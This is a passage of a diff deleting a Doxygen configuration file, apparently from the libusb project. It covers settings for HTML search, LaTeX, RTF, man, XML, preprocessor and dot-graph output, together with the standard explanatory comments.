-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you can set the default output format to be used for
-# the MathJax output. See the MathJax site (see:
-# http://docs.mathjax.org/en/latest/output.html) for more details.
-# Possible values are: HTML-CSS (which is slower, but has the best
-# compatibility), NativeMML (i.e. MathML) and SVG.
-# The default value is: HTML-CSS.
-# This tag requires that the tag USE_MATHJAX is set to YES.
-
-MATHJAX_FORMAT         = HTML-CSS
-
-# When MathJax is enabled you need to specify the location relative to the HTML
-# output directory using the MATHJAX_RELPATH option. The destination directory
-# should contain the MathJax.js script. For instance, if the mathjax directory
-# is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to the MathJax
-# Content Delivery Network so you can quickly see the result without installing
-# MathJax. However, it is strongly recommended to install a local copy of
-# MathJax from http://www.mathjax.org before deployment.
-# The default value is: http://cdn.mathjax.org/mathjax/latest.
-# This tag requires that the tag USE_MATHJAX is set to YES.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or more MathJax
-# extension names that should be enabled during MathJax rendering. For example
-# MATHJAX_EXTENSIONS = TeX/AMSmath TeX/AMSsymbols
-# This tag requires that the tag USE_MATHJAX is set to YES.
-
-MATHJAX_EXTENSIONS     =
-
-# The MATHJAX_CODEFILE tag can be used to specify a file with javascript pieces
-# of code that will be used on startup of the MathJax code. See the MathJax site
-# (see: http://docs.mathjax.org/en/latest/output.html) for more details. For an
-# example see the documentation.
-# This tag requires that the tag USE_MATHJAX is set to YES.
-
-MATHJAX_CODEFILE       =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box for
-# the HTML output. The underlying search engine uses javascript and DHTML and
-# should work on any modern browser. Note that when using HTML help
-# (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets (GENERATE_DOCSET)
-# there is already a search function so this one should typically be disabled.
-# For large projects the javascript based search engine can be slow, then
-# enabling SERVER_BASED_SEARCH may provide a better solution. It is possible to
-# search using the keyboard; to jump to the search box use <access key> + S
-# (what the <access key> is depends on the OS and browser, but it is typically
-# <CTRL>, <ALT>/<option>, or both). Inside the search box use the <cursor down
-# key> to jump into the search results window, the results can be navigated
-# using the <cursor keys>. Press <Enter> to select an item or <escape> to cancel
-# the search. The filter options can be selected when the cursor is inside the
-# search box by pressing <Shift>+<cursor down>. Also here use the <cursor keys>
-# to select a filter and <Enter> or <escape> to activate or cancel the filter
-# option.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-SEARCHENGINE           = NO
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a web server instead of a web client using Javascript. There
-# are two flavours of web server based searching depending on the
-# EXTERNAL_SEARCH setting. When disabled, doxygen will generate a PHP script for
-# searching and an index file used by the script. When EXTERNAL_SEARCH is
-# enabled the indexing and searching needs to be provided by external tools. See
-# the section "External Indexing and Searching" for details.
-# The default value is: NO.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-SERVER_BASED_SEARCH    = NO
-
-# When EXTERNAL_SEARCH tag is enabled doxygen will no longer generate the PHP
-# script for searching. Instead the search results are written to an XML file
-# which needs to be processed by an external indexer. Doxygen will invoke an
-# external search engine pointed to by the SEARCHENGINE_URL option to obtain the
-# search results.
-#
-# Doxygen ships with an example indexer ( doxyindexer) and search engine
-# (doxysearch.cgi) which are based on the open source search engine library
-# Xapian (see: http://xapian.org/).
-#
-# See the section "External Indexing and Searching" for details.
-# The default value is: NO.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-EXTERNAL_SEARCH        = NO
-
-# The SEARCHENGINE_URL should point to a search engine hosted by a web server
-# which will return the search results when EXTERNAL_SEARCH is enabled.
-#
-# Doxygen ships with an example indexer ( doxyindexer) and search engine
-# (doxysearch.cgi) which are based on the open source search engine library
-# Xapian (see: http://xapian.org/). See the section "External Indexing and
-# Searching" for details.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-SEARCHENGINE_URL       =
-
-# When SERVER_BASED_SEARCH and EXTERNAL_SEARCH are both enabled the unindexed
-# search data is written to a file for indexing by an external tool. With the
-# SEARCHDATA_FILE tag the name of this file can be specified.
-# The default file is: searchdata.xml.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-SEARCHDATA_FILE        = searchdata.xml
-
-# When SERVER_BASED_SEARCH and EXTERNAL_SEARCH are both enabled the
-# EXTERNAL_SEARCH_ID tag can be used as an identifier for the project. This is
-# useful in combination with EXTRA_SEARCH_MAPPINGS to search through multiple
-# projects and redirect the results back to the right project.
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-EXTERNAL_SEARCH_ID     =
-
-# The EXTRA_SEARCH_MAPPINGS tag can be used to enable searching through doxygen
-# projects other than the one defined by this configuration file, but that are
-# all added to the same external search index. Each project needs to have a
-# unique id set via EXTERNAL_SEARCH_ID. The search mapping then maps the id of
-# to a relative location where the documentation can be found. The format is:
-# EXTRA_SEARCH_MAPPINGS = tagname1=loc1 tagname2=loc2 ...
-# This tag requires that the tag SEARCHENGINE is set to YES.
-
-EXTRA_SEARCH_MAPPINGS  =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES doxygen will generate LaTeX output.
-# The default value is: YES.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it.
-# The default directory is: latex.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked.
-#
-# Note that when enabling USE_PDFLATEX this option is only used for generating
-# bitmaps for formulas in the HTML output, but not in the Makefile that is
-# written to the output directory.
-# The default file is: latex.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to generate
-# index for LaTeX.
-# The default file is: makeindex.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES doxygen generates more compact LaTeX
-# documents. This may be useful for small projects and may help to save some
-# trees in general.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used by the
-# printer.
-# Possible values are: a4 (210 x 297 mm), letter (8.5 x 11 inches), legal (8.5 x
-# 14 inches) and executive (7.25 x 10.5 inches).
-# The default value is: a4.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be used to specify one or more LaTeX package names
-# that should be included in the LaTeX output. To get the times font for
-# instance you can specify
-# EXTRA_PACKAGES=times
-# If left blank no extra packages will be included.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for the
-# generated LaTeX document. The header should contain everything until the first
-# chapter. If it is left blank doxygen will generate a standard header. See
-# section "Doxygen usage" for information on how to let doxygen write the
-# default header to a separate file.
-#
-# Note: Only use a user-defined header if you know what you are doing! The
-# following commands have a special meaning inside the header: $title,
-# $datetime, $date, $doxygenversion, $projectname, $projectnumber. Doxygen will
-# replace them by respectively the title of the page, the current date and time,
-# only the current date, the version number of doxygen, the project name (see
-# PROJECT_NAME), or the project number (see PROJECT_NUMBER).
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for the
-# generated LaTeX document. The footer should contain everything after the last
-# chapter. If it is left blank doxygen will generate a standard footer.
-#
-# Note: Only use a user-defined footer if you know what you are doing!
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_FOOTER           =
-
-# The LATEX_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the LATEX_OUTPUT output
-# directory. Note that the files will be copied as-is; there are no commands or
-# markers available.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_EXTRA_FILES      =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated is
-# prepared for conversion to PDF (using ps2pdf or pdflatex). The PDF file will
-# contain links (just like the HTML output) instead of page references. This
-# makes the output suitable for online browsing using a PDF viewer.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-PDF_HYPERLINKS         = NO
-
-# If the LATEX_PDFLATEX tag is set to YES, doxygen will use pdflatex to generate
-# the PDF file directly from the LaTeX files. Set this option to YES to get a
-# higher quality PDF documentation.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-USE_PDFLATEX           = NO
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \batchmode
-# command to the generated LaTeX files. This will instruct LaTeX to keep running
-# if errors occur, instead of asking the user for help. This option is also used
-# when generating formulas in HTML.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_BATCHMODE        = NO
-
-# If the LATEX_HIDE_INDICES tag is set to YES then doxygen will not include the
-# index chapters (such as File Index, Compound Index, etc.) in the output.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_HIDE_INDICES     = NO
-
-# If the LATEX_SOURCE_CODE tag is set to YES then doxygen will include source
-# code with syntax highlighting in the LaTeX output.
-#
-# Note that which sources are shown also depends on other settings such as
-# SOURCE_BROWSER.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. See
-# http://en.wikipedia.org/wiki/BibTeX and \cite for more info.
-# The default value is: plain.
-# This tag requires that the tag GENERATE_LATEX is set to YES.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# Configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES doxygen will generate RTF output. The
-# RTF output is optimized for Word 97 and may not look too pretty with other RTF
-# readers/editors.
-# The default value is: NO.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it.
-# The default directory is: rtf.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES doxygen generates more compact RTF
-# documents. This may be useful for small projects and may help to save some
-# trees in general.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated will
-# contain hyperlink fields. The RTF file will contain links (just like the HTML
-# output) instead of page references. This makes the output suitable for online
-# browsing using Word or some other Word compatible readers that support those
-# fields.
-#
-# Note: WordPad (write) and others do not support links.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-RTF_HYPERLINKS         = NO
-
-# Load stylesheet definitions from file. Syntax is similar to doxygen's config
-# file, i.e. a series of assignments. You only have to provide replacements,
-# missing definitions are set to their default value.
-#
-# See also section "Doxygen usage" for information on how to generate the
-# default style sheet that doxygen normally uses.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an RTF document. Syntax is
-# similar to doxygen's config file. A template extensions file can be generated
-# using doxygen -e rtf extensionFile.
-# This tag requires that the tag GENERATE_RTF is set to YES.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES doxygen will generate man pages for
-# classes and files.
-# The default value is: NO.
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it. A directory man3 will be created inside the directory specified by
-# MAN_OUTPUT.
-# The default directory is: man.
-# This tag requires that the tag GENERATE_MAN is set to YES.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to the generated
-# man pages. In case the manual section does not start with a number, the number
-# 3 is prepended. The dot (.) at the beginning of the MAN_EXTENSION tag is
-# optional.
-# The default value is: .3.
-# This tag requires that the tag GENERATE_MAN is set to YES.
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and doxygen generates man output, then it
-# will generate one additional man file for each entity documented in the real
-# man page(s). These additional files only source the real man page, but without
-# them the man command would be unable to find the correct page.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_MAN is set to YES.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# Configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES doxygen will generate an XML file that
-# captures the structure of the code including all documentation.
-# The default value is: NO.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it.
-# The default directory is: xml.
-# This tag requires that the tag GENERATE_XML is set to YES.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify a XML schema, which can be used by a
-# validating XML parser to check the syntax of the XML files.
-# This tag requires that the tag GENERATE_XML is set to YES.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify a XML DTD, which can be used by a
-# validating XML parser to check the syntax of the XML files.
-# This tag requires that the tag GENERATE_XML is set to YES.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES doxygen will dump the program
-# listings (including syntax highlighting and cross-referencing information) to
-# the XML output. Note that enabling this will significantly increase the size
-# of the XML output.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_XML is set to YES.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# Configuration options related to the DOCBOOK output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_DOCBOOK tag is set to YES doxygen will generate Docbook files
-# that can be used to generate PDF.
-# The default value is: NO.
-
-GENERATE_DOCBOOK       = NO
-
-# The DOCBOOK_OUTPUT tag is used to specify where the Docbook pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be put in
-# front of it.
-# The default directory is: docbook.
-# This tag requires that the tag GENERATE_DOCBOOK is set to YES.
-
-DOCBOOK_OUTPUT         = docbook
-
-#---------------------------------------------------------------------------
-# Configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES doxygen will generate an AutoGen
-# Definitions (see http://autogen.sf.net) file that captures the structure of
-# the code including all documentation. Note that this feature is still
-# experimental and incomplete at the moment.
-# The default value is: NO.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# Configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES doxygen will generate a Perl module
-# file that captures the structure of the code including all documentation.
-#
-# Note that this feature is still experimental and incomplete at the moment.
-# The default value is: NO.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES doxygen will generate the necessary
-# Makefile rules, Perl scripts and LaTeX code to be able to generate PDF and DVI
-# output from the Perl module output.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_PERLMOD is set to YES.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be nicely
-# formatted so it can be parsed by a human reader. This is useful if you want to
-# understand what is going on. On the other hand, if this tag is set to NO the
-# size of the Perl module output will be much smaller and Perl will parse it
-# just the same.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_PERLMOD is set to YES.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file are
-# prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX. This is useful
-# so different doxyrules.make files included by the same Makefile don't
-# overwrite each other's variables.
-# This tag requires that the tag GENERATE_PERLMOD is set to YES.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES doxygen will evaluate all
-# C-preprocessor directives found in the sources and include files.
-# The default value is: YES.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES doxygen will expand all macro names
-# in the source code. If set to NO only conditional compilation will be
-# performed. Macro expansion can be done in a controlled way by setting
-# EXPAND_ONLY_PREDEF to YES.
-# The default value is: NO.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES then
-# the macro expansion is limited to the macros specified with the PREDEFINED and
-# EXPAND_AS_DEFINED tags.
-# The default value is: NO.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-EXPAND_ONLY_PREDEF     = YES
-
-# If the SEARCH_INCLUDES tag is set to YES the includes files in the
-# INCLUDE_PATH will be searched if a #include is found.
-# The default value is: YES.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by the
-# preprocessor.
-# This tag requires that the tag SEARCH_INCLUDES is set to YES.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will be
-# used.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that are
-# defined before the preprocessor is started (similar to the -D option of e.g.
-# gcc). The argument of the tag is a list of macros of the form: name or
-# name=definition (no spaces). If the definition and the "=" are omitted, "=1"
-# is assumed. To prevent a macro definition from being undefined via #undef or
-# recursively expanded use the := operator instead of the = operator.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-PREDEFINED             = API_EXPORTED= \
-                         LIBUSB_CALL= \
-                         DEFAULT_VISIBILITY=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then this
-# tag can be used to specify a list of macro names that should be expanded. The
-# macro definition that is found in the sources will be used. Use the PREDEFINED
-# tag if you want to use a different macro definition that overrules the
-# definition found in the source code.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES then doxygen's preprocessor will
-# remove all refrences to function-like macros that are alone on a line, have an
-# all uppercase name, and do not end with a semicolon. Such function macros are
-# typically used for boiler-plate code, and will confuse the parser if not
-# removed.
-# The default value is: YES.
-# This tag requires that the tag ENABLE_PREPROCESSING is set to YES.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration options related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES tag can be used to specify one or more tag files. For each tag
-# file the location of the external documentation should be added. The format of
-# a tag file without this location is as follows:
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where loc1 and loc2 can be relative or absolute paths or URLs. See the
-# section "Linking to external documentation" for more information about the use
-# of tag files.
-# Note: Each tag file must have an unique name (where the name does NOT include
-# the path). If a tag file is not located in the directory in which doxygen is
-# run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create a
-# tag file that is based on the input files it reads. See section "Linking to
-# external documentation" for more information about the usage of tag files.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external class will be listed in the
-# class index. If set to NO only the inherited external classes will be listed.
-# The default value is: NO.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed in
-# the modules index. If set to NO, only the current project's groups will be
-# listed.
-# The default value is: YES.
-
-EXTERNAL_GROUPS        = YES
-
-# If the EXTERNAL_PAGES tag is set to YES all external pages will be listed in
-# the related pages index. If set to NO, only the current project's pages will
-# be listed.
-# The default value is: YES.
-
-EXTERNAL_PAGES         = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of 'which perl').
-# The default file (with absolute path) is: /usr/bin/perl.
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES doxygen will generate a class diagram
-# (in HTML and LaTeX) for classes with base or super classes. Setting the tag to
-# NO turns the diagrams off. Note that this option also works with HAVE_DOT
-# disabled, but it is recommended to install and use dot, since it yields more
-# powerful graphs.
-# The default value is: YES.
-
-CLASS_DIAGRAMS         = YES
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see:
-# http://www.mcternan.me.uk/mscgen/)) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide inheritance
-# and usage relations if the target is undocumented or is not a class.
-# The default value is: YES.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz (see:
-# http://www.graphviz.org/), a graph visualization toolkit from AT&T and Lucent
-# Bell Labs. The other options in this section have no effect if this option is
-# set to NO
-# The default value is: NO.
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is allowed
-# to run in parallel. When set to 0 doxygen will base this on the number of
-# processors available in the system. You can set it explicitly to a value
-# larger than 0 to get control over the balance between CPU load and processing
-# speed.
-# Minimum value: 0, maximum value: 32, default value: 0.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_NUM_THREADS        = 0
-
-# When you want a differently looking font n the dot files that doxygen
-# generates you can specify the font name using DOT_FONTNAME. You need to make
-# sure dot is able to find the font, which can be done by putting it in a
-# standard location or by setting the DOTFONTPATH environment variable or by
-# setting DOT_FONTPATH to the directory containing the font.
-# The default value is: Helvetica.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_FONTNAME           = FreeSans.ttf
-
-# The DOT_FONTSIZE tag can be used to set the size (in points) of the font of
-# dot graphs.
-# Minimum value: 4, maximum value: 24, default value: 10.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the default font as specified with
-# DOT_FONTNAME. If you specify a different font using DOT_FONTNAME you can set
-# the path where dot can find it using this tag.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH tag is set to YES then doxygen will generate a graph for
-# each documented class showing the direct and indirect inheritance relations.
-# Setting this tag to YES will force the CLASS_DIAGRAMS tag to NO.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH tag is set to YES then doxygen will generate a
-# graph for each documented class showing the direct and indirect implementation
-# dependencies (inheritance, containment, and class references variables) of the
-# class with other documented classes.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS tag is set to YES then doxygen will generate a graph for
-# groups, showing the direct groups dependencies.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside the
-# class node. If there are many fields or methods and many nodes the graph may
-# become too big to be useful. The UML_LIMIT_NUM_FIELDS threshold limits the
-# number of items for each type to make the size more manageable. Set this to 0
-# for no limit. Note that the threshold may be exceeded by 50% before the limit
-# is enforced. So when you set the threshold to 10, up to 15 fields may appear,
-# but if the number exceeds 15, the total amount of fields shown is limited to
-# 10.
-# Minimum value: 0, maximum value: 100, default value: 10.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If the TEMPLATE_RELATIONS tag is set to YES then the inheritance and
-# collaboration graphs will show the relations between templates and their
-# instances.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the INCLUDE_GRAPH, ENABLE_PREPROCESSING and SEARCH_INCLUDES tags are set to
-# YES then doxygen will generate a graph for each documented file showing the
-# direct and indirect include dependencies of the file with other documented
-# files.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-INCLUDE_GRAPH          = YES
-
-# If the INCLUDED_BY_GRAPH, ENABLE_PREPROCESSING and SEARCH_INCLUDES tags are
-# set to YES then doxygen will generate a graph for each documented file showing
-# the direct and indirect include dependencies of the file with other documented
-# files.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH tag is set to YES then doxygen will generate a call
-# dependency graph for every global function or class method.
-#
-# Note that enabling this option will significantly increase the time of a run.
-# So in most cases it will be better to enable call graphs for selected
-# functions only using the \callgraph command.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-CALL_GRAPH             = NO
-
-# If the CALLER_GRAPH tag is set to YES then doxygen will generate a caller
-# dependency graph for every global function or class method.
-#
-# Note that enabling this option will significantly increase the time of a run.
-# So in most cases it will be better to enable caller graphs for selected
-# functions only using the \callergraph command.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-CALLER_GRAPH           = NO
-
-# If the GRAPHICAL_HIERARCHY tag is set to YES then doxygen will graphical
-# hierarchy of all classes instead of a textual one.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH tag is set to YES then doxygen will show the
-# dependencies a directory has on other directories in a graphical way. The
-# dependency relations are determined by the #include relations between the
-# files in the directories.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot.
-# Note: If you choose svg you need to set HTML_FILE_EXTENSION to xhtml in order
-# to make the SVG files visible in IE 9+ (other browsers do not have this
-# requirement).
-# Possible values are: png, jpg, gif and svg.
-# The default value is: png.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-#
-# Note that this requires a modern browser other than Internet Explorer. Tested
-# and working are Firefox, Chrome, Safari, and Opera.
-# Note: For IE 9+ you need to set HTML_FILE_EXTENSION to xhtml in order to make
-# the SVG files visible. Older versions of IE do not have SVG support.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-INTERACTIVE_SVG        = NO
-
-# The DOT_PATH tag can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the \dotfile
-# command).
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the \mscfile
-# command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of nodes
-# that will be shown in the graph. If the number of nodes in a graph becomes
-# larger than this value, doxygen will truncate the graph, which is visualized
-# by representing a node as a red box. Note that doxygen if the number of direct
-# children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note that
-# the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-# Minimum value: 0, maximum value: 10000, default value: 50.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the graphs
-# generated by dot. A depth value of 3 means that only nodes reachable from the
-# root by following a path via at most 3 edges will be shown. Nodes that lay
-# further from the root node will be omitted. Note that setting this option to 1
-# or 2 may greatly reduce the computation time needed for large code bases. Also
-# note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-# Minimum value: 0, maximum value: 1000, default value: 0.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
